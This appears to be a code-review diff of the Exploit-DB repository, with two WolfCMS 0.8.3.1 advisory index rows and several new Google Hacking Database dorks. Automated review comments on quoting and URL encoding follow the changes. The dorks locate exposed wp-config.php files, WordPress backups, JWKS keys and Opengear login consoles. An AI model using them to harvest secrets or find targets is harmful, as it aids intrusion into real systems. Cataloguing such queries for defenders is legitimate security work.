44418,exploits/php/webapps/44418.txt,"WolfCMS 0.8.3.1 - Cross-Site Request Forgery",2018-04-09,"Sureshbabu Narvaneni",webapps,php,,2018-04-09,2018-04-11,0,CVE-2018-8814,,,,http://www.exploit-db.comwolfcms-0.8.3.1.zip, 44418,exploits/php/webapps/44418.txt,"WolfCMS 0.8.3.1 - Cross-Site Request Forgery",2018-04-09,"Sureshbabu Narvaneni",webapps,php,,2018-04-09,2018-04-11,0,CVE-2018-8814,,,,http://www.exploit-db.comwolfcms-0.8.3.1.zip,
44421,exploits/php/webapps/44421.txt,"WolfCMS 0.8.3.1 - Open Redirection",2018-04-09,"Sureshbabu Narvaneni",webapps,php,80,2018-04-09,2018-04-09,0,CVE-2018-8813,,,,http://www.exploit-db.comwolfcms-0.8.3.1.zip, 44421,exploits/php/webapps/44421.txt,"WolfCMS 0.8.3.1 - Open Redirection",2018-04-09,"Sureshbabu Narvaneni",webapps,php,80,2018-04-09,2018-04-09,0,CVE-2018-8813,,,,http://www.exploit-db.comwolfcms-0.8.3.1.zip,
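Review bot: The added row 51421 leaves the application link column empty, although the two existing rows for the same version (44418 and 44421) already reference the archived wolfcms-0.8.3.1.zip in that column. Filling it in would let readers confirm the affected build. The product is also spelled "Wolf CMS" here but "WolfCMS" on the other 0.8.3.1 rows, which is why the new row sorts away from them; picking one spelling would keep all entries for this version adjacent.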

105
ghdb.xml

@ -38814,6 +38814,36 @@ misconfigured servers.
<date>2021-11-08</date> <date>2021-11-08</date>
<author>Sandesh Ajgekar</author> <author>Sandesh Ajgekar</author>
</entry> </entry>
<entry>
<id>8179</id>
<link>https://www.exploit-db.com/ghdb/8179</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;index of&quot; inurl:json-rpc</shortDescription>
<textualDescription># Google Dork: intext:&quot;index of&quot; inurl:json-rpc
# Files Containing Juicy Info
# Date:05/05/2023
# Exploit Author: Praharsh Kumar Singh</textualDescription>
<query>intext:&quot;index of&quot; inurl:json-rpc</query>
<querystring>https://www.google.com/search?q=intext:&quot;index of&quot; inurl:json-rpc</querystring>
<edb></edb>
<date>2023-05-05</date>
<author>Praharsh Kumar Singh</author>
</entry>
<entry>
<id>8177</id>
<link>https://www.exploit-db.com/ghdb/8177</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;index of&quot; inurl:jwks-rsa</shortDescription>
<textualDescription># Google Dork: intext:&quot;index of&quot; inurl:jwks-rsa
# Files Containing Juicy Info
# Date:05/05/2023
# Exploit Author: Praharsh Kumar Singh</textualDescription>
<query>intext:&quot;index of&quot; inurl:jwks-rsa</query>
<querystring>https://www.google.com/search?q=intext:&quot;index of&quot; inurl:jwks-rsa</querystring>
<edb></edb>
<date>2023-05-05</date>
<author>Praharsh Kumar Singh</author>
</entry>
<entry> <entry>
<id>8106</id> <id>8106</id>
<link>https://www.exploit-db.com/ghdb/8106</link> <link>https://www.exploit-db.com/ghdb/8106</link>
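Review bot: In both added entries (8179 and 8177) the querystring element holds a URL with literal spaces and XML-escaped double quotes inside the q parameter, for example "q=intext:&quot;index of&quot; inurl:json-rpc". After XML unescaping that value is not a valid URL, so any consumer that treats the element as a link has to re-encode it itself. Suggest percent-encoding the parameter value (%20 for spaces, %22 for quotes) when the entry is generated. The free-text "Date:05/05/2023" in textualDescription is also ambiguous between day-first and month-first; the ISO value in the date element should be treated as authoritative.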
@ -40701,6 +40731,21 @@ Information about user data is obtained
<date>2022-06-20</date> <date>2022-06-20</date>
<author>Suman Das</author> <author>Suman Das</author>
</entry> </entry>
<entry>
<id>8175</id>
<link>https://www.exploit-db.com/ghdb/8175</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of &quot;phpunit.yml&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of &quot;phpunit.yml&quot;
# Files Containing Juicy Info
# Date:05/05/2023
# Exploit Author: Suman Das</textualDescription>
<query>intitle:&quot;index of &quot;phpunit.yml&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of &quot;phpunit.yml&quot;</querystring>
<edb></edb>
<date>2023-05-05</date>
<author>Suman Das</author>
</entry>
<entry> <entry>
<id>6284</id> <id>6284</id>
<link>https://www.exploit-db.com/ghdb/6284</link> <link>https://www.exploit-db.com/ghdb/6284</link>
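Review bot: The query in added entry 8175 has an odd number of double quotes: intitle:&quot;index of &quot;phpunit.yml&quot; contains three, so the phrase boundaries are ambiguous and the stored string probably does not match what the submitter intended. The same unbalanced text is repeated in shortDescription, textualDescription, query and querystring. Suggest confirming the intended form with the submitter and correcting all four fields together.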
@ -43502,6 +43547,21 @@ the &quot;dovecot.crt.cache&quot; files.
<date>2020-04-30</date> <date>2020-04-30</date>
<author>Alexandros Pappas</author> <author>Alexandros Pappas</author>
</entry> </entry>
<entry>
<id>8178</id>
<link>https://www.exploit-db.com/ghdb/8178</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;download.php?file=&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;download.php?file=&quot;
# Files Containing Juicy Info
# Date:05/05/2023
# Exploit Author: Praharsh Kumar Singh</textualDescription>
<query>intitle:&quot;index of&quot; &quot;download.php?file=&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;download.php?file=&quot;</querystring>
<edb></edb>
<date>2023-05-05</date>
<author>Praharsh Kumar Singh</author>
</entry>
<entry> <entry>
<id>7748</id> <id>7748</id>
<link>https://www.exploit-db.com/ghdb/7748</link> <link>https://www.exploit-db.com/ghdb/7748</link>
@ -50138,6 +50198,36 @@ used quite often, usually hidden from google with robots.txt. Author: easypwn</t
<date>2019-12-12</date> <date>2019-12-12</date>
<author>Aamir Rehman</author> <author>Aamir Rehman</author>
</entry> </entry>
<entry>
<id>8180</id>
<link>https://www.exploit-db.com/ghdb/8180</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;wp-content&quot; intitle:&quot;index.of&quot; intext:backup&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;wp-content&quot; intitle:&quot;index.of&quot; intext:backup&quot;
# Files Containing Juicy Info
# Date:05/05/2023
# Exploit Author: Andrew Gimenez</textualDescription>
<query>inurl:&quot;wp-content&quot; intitle:&quot;index.of&quot; intext:backup&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;wp-content&quot; intitle:&quot;index.of&quot; intext:backup&quot;</querystring>
<edb></edb>
<date>2023-05-05</date>
<author>Andrew Gimenez</author>
</entry>
<entry>
<id>8181</id>
<link>https://www.exploit-db.com/ghdb/8181</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;wp-content&quot; intitle:&quot;index.of&quot; intext:wp-config.php</shortDescription>
<textualDescription># Google Dork: inurl:&quot;wp-content&quot; intitle:&quot;index.of&quot; intext:wp-config.php
# Files Containing Juicy Info
# Date:05/05/2023
# Exploit Author: Andrew Gimenez</textualDescription>
<query>inurl:&quot;wp-content&quot; intitle:&quot;index.of&quot; intext:wp-config.php</query>
<querystring>https://www.google.com/search?q=inurl:&quot;wp-content&quot; intitle:&quot;index.of&quot; intext:wp-config.php</querystring>
<edb></edb>
<date>2023-05-05</date>
<author>Andrew Gimenez</author>
</entry>
<entry> <entry>
<id>4561</id> <id>4561</id>
<link>https://www.exploit-db.com/ghdb/4561</link> <link>https://www.exploit-db.com/ghdb/4561</link>
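Review bot: Entry 8180 ends its query with a stray double quote: intext:backup&quot; has a closing quote with no opening one, while the sibling entry 8181 from the same author (intext:wp-config.php) has none. This looks like a copy error carried into shortDescription, textualDescription, query and querystring alike. Suggest removing the trailing quote or adding the missing opening one, after checking the original submission.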
@ -68678,6 +68768,21 @@ Author: Sibi Mathew George
<date>2023-02-27</date> <date>2023-02-27</date>
<author>GirlsLearnCyber</author> <author>GirlsLearnCyber</author>
</entry> </entry>
<entry>
<id>8176</id>
<link>https://www.exploit-db.com/ghdb/8176</link>
<category>Pages Containing Login Portals</category>
<shortDescription>allintitle:&quot;Opengear Management Console&quot;</shortDescription>
<textualDescription># Google Dork: allintitle:&quot;Opengear Management Console&quot;
# Pages Containing Login Portals
# Date:05/05/2023
# Exploit Author: GirlsLearnCyber</textualDescription>
<query>allintitle:&quot;Opengear Management Console&quot;</query>
<querystring>https://www.google.com/search?q=allintitle:&quot;Opengear Management Console&quot;</querystring>
<edb></edb>
<date>2023-05-05</date>
<author>GirlsLearnCyber</author>
</entry>
<entry> <entry>
<id>8127</id> <id>8127</id>
<link>https://www.exploit-db.com/ghdb/8127</link> <link>https://www.exploit-db.com/ghdb/8127</link>